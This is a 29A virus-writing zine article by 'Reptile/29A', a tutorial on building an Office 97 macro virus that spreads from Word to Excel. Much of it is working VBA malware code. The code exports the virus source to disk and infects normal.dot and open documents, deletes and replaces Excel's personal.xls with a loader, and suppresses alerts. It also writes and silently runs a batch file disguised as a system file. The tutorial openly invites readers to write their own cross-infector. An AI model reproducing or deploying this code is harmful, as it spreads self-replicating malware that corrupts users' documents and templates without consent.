Copy Link
Add to Bookmark
Report
29A Issue 03 02 07
Cross Infection Tutorial for Office'97 PART I
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
Reptile/29A
Intro
ÄÄÄÄÄ
When I started working on Office Cross Infections I had no idea how to jump
from Word to Excel and vice versa. So I first began to research a bit on the
OLE2 format but realized that it's very complex :P and can't be done in VBA
(Visual Basic for Applications - all office'97 programs are using this).
Then I tried to manage it with OLE Automation, but anyways this didn't work
coz you have to import sum libs manually. After more researching I found
sum info on DDE (Dynamic Data-Exchange). With DDE you can send data from
one application to an other. I managed it to import code from word into
excel using DDE and the SendKeys command. But this was way too suspicious
becoz the user could see it very well. (VicodinES, Alt-F11 and me are shari-
ng macro ideas/code since the beginning of the word/excel infecting idea...
so all the cross infectors known till now could be seen as the success of
our teamwork. Now Alt-F11 finally managed to write a less suspicious DDE
macro virus by using DDE entries, gewd work man! ;)
Becoz of time pressure (mgl also wanted to be first :) I was switching from
the DDE stuff to an idea I had while lying stoned to death in my bed after
reading about the kewl import/export method - thanx again vic! The virus
exports it's source to the harddisk and then dr0ps a global template
(normal.dot for word and personal.xls for excel) that works as loader and
imports the virus source again in the other application.
DDE vs. Strange Days method
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
To build your own opinion I'd recommend to first take a l00k at the strange
days source (dr0pping a global template) and the shiver source (DDE) which
are included in this issue.
Well, the main disadvantage of the strange days way is that the virus be-
comes extremely huge. The problem that it needs debug.exe to spread isn't
a real problem at all coz everyone (even NT users) got it anyways.
On the other side the sucking thingy on DDE is that you have to start the
other application before opening a channel and then you need to use the
SendKeys command to force word to import the virus. At this moment word
popps up of it's minimized state for a short moment and is noticeable/sus-
picious.
Anyways don't forget to read more about DDE in the part II of the cross
infection tuto (DDE could also be interesting for other viruses)!
Basic Concept
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
Here I'll try to give an overview how an infected doc file gets processed
and jumps to excel (excel to word works the same way - just vice versa)
Word: * c:\ * Excel:
* *
* ÚÄÄÄÄÄÄÄÄÄ¿ *
1.) export virus * ³ Lo.sys: ³ 4.) The next time excel is
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ virus ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» started per-
³ source to c:\ * ³ source ³ * º sonal.xls
³ * ÀÄÄÄÄÄÄÄÄÄÙ * + will import
ÚÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄ¿ 3.) drop the loader ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ INFECTED DOC FILE: ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ uninfected Personal.xls: ³
³ virus source + loader ³ * * ³ loader ³
ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÒÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
2.) infect ³ normal.dot * * º Lo.sys!
+ * * +
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ * * ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Infected normal.dot: ³ * * ³ *Infected* personal.xls: ³
³ virus source + loader ³ * * ³ virus source + loader ³
ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
infect more³ doc files * * +
³ * * here the whole tale begins
+ * * again..
Detailed Information
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In this section the theory will get practised and the important stuff is
explained step by step (word to excel only coz excel to word is the same
thing again, just vice versa).
First you have to export the virus source code, so the loader will be l8r
able to import it to excel.
Application.VBE.ActiveVBProject.VBComponents("StrangeDays").Export "c:\lo
.sys"
Ok, now you have to check if you are in word or excel. This can simply
be done this way coz in excel there will never be an active document.
If ActiveDocument = "" Then GoTo teonanacatl
Then check if normal.dot and the active document are infected.
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then r =
True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "StrangeDays" Then e =
True
Next i
If they're still clean you should infect them by using the standard import/
export infection technique to avoid the sr-2 protection.
If e = False Then
With ActiveDocument.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFo
rmatDocument
End If
If r = False Then
With NormalTemplate.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
End If
Now you have to check if excel already is infected. This can be done in
various ways, for example marking it in a file (like here) or in the
registry.
a = GetPrivateProfileStringA("29A", "Magic", "", b, 255, "c:\lo.idx")
If b = "666" Then GoTo godsucks
After you're sure that excel is not infected yet, you must use api calls
to access the registry and get the full path of excel.
u = RegQueryValueExA(k, "Path", 0, REG_SZ, ByVal v$, s)
u = RegCloseKey(k)
For e = 1 To Len(v$)
If Mid$(v$, e, 1) = Chr$(0) Then GoTo lizard
h$ = h$ + Mid$(v$, e, 1)
Next e
lizard:
Ok, now you got the path of the original personal.xls which you have to
delete and replace it with the corrupted one that imports the virus source.
p = h$ + "\xlstart\personal.xls"
DeleteFileA (p)
Open "c:\a.scr" For Output As 1
Print #1, "N PERSONAL.XLS"
Print #1, "E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00"
Print #1, "E 0110 00 00 00 00 00 00 00 [...]
Close 1
This is how the code of the personal.xls-loader looks:
===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub Auto_Close()
On Error GoTo argh
Application.DisplayAlerts = False
Application.EnableCancelKey = xlDisabled
For i = 1 To Workbooks("personal.xls").VBProject.VBComponents.Count
If Workbooks("personal.xls").VBProject.VBComponents(i).Name = "StrangeDays"
Then GoTo argh
Next i
With Workbooks("personal.xls").VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
Workbooks("personal.xls").Save
argh:
End Sub
===========================================================================
The code of the normal.dot-loader l00ks a bit diffrent but does the same:
===========================================================================
Module name: syaDegnartS (Macro)
---------------------------------------------------------------------------
Attribute VB_Name = "syaDegnartS"
Sub AutoExec()
On Error GoTo argh
Application.DisplayAlerts = False
Application.EnableCancelKey = wdDisabled
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo
argh
Next i
With NormalTemplate.VBProject
With .VBComponents.Import("c:\lo.sys")
End With
End With
NormalTemplate.Save
argh:
End Sub
===========================================================================
Then you have to build a batch file that converts the debug script of
normal.dot and copies it to the word template path and deletes all the
other files, that you don't need anymore.
Open "c:\start.bat" For Output As 1
Print #1, "REM This is a system file. Do not edit or remove!"
Print #1, "@echo off"
Print #1, "c:"
Print #1, "cd\"
Print #1, "dir"
Print #1, "debug < a.scr > nul"
Print #1, "copy personal.xls " + p
Print #1, "del a.scr"
Print #1, "del personal.xls"
Close 1
Shell "c:\start.bat", vbHide
To finish the whole process mark excel as infected.
c = WritePrivateProfileStringA("29A", "Magic", "666", "c:\lo.idx")
Diffrent AutoMacros
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In word and excel the automacros are diffrent so don't forget to add an
excel automacro that references to the word automacro else it won't be
run.
For example this macro (and with it the virus code) is executed automatic-
ally by word every time a file gets closed.
Sub AutoClose()
(virus code)
End Sub
While this macro is launched by excel every time a file gets opened. It then
just calls the macro above (containing the virus code).
Sub Auto_Open()
Application.OnSheetActivate = "StrangeDays.AutoClose"
End Sub
Cross Infector Info
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Cross: http://www.avp.ch/avpve/macro/xmulti/cross.stm
Strange Days: http://www.avp.ch/avpve/macro/xmulti/teocatl.stm
Shiver: http://www.avp.ch/avpve/macro/xmulti/SHIVER.stm
Well I guess this is enough information for writing an own cross infex0r
if I didn't forget too much details in my speedy rush..
see yah in hell,
-Reptile/29A-
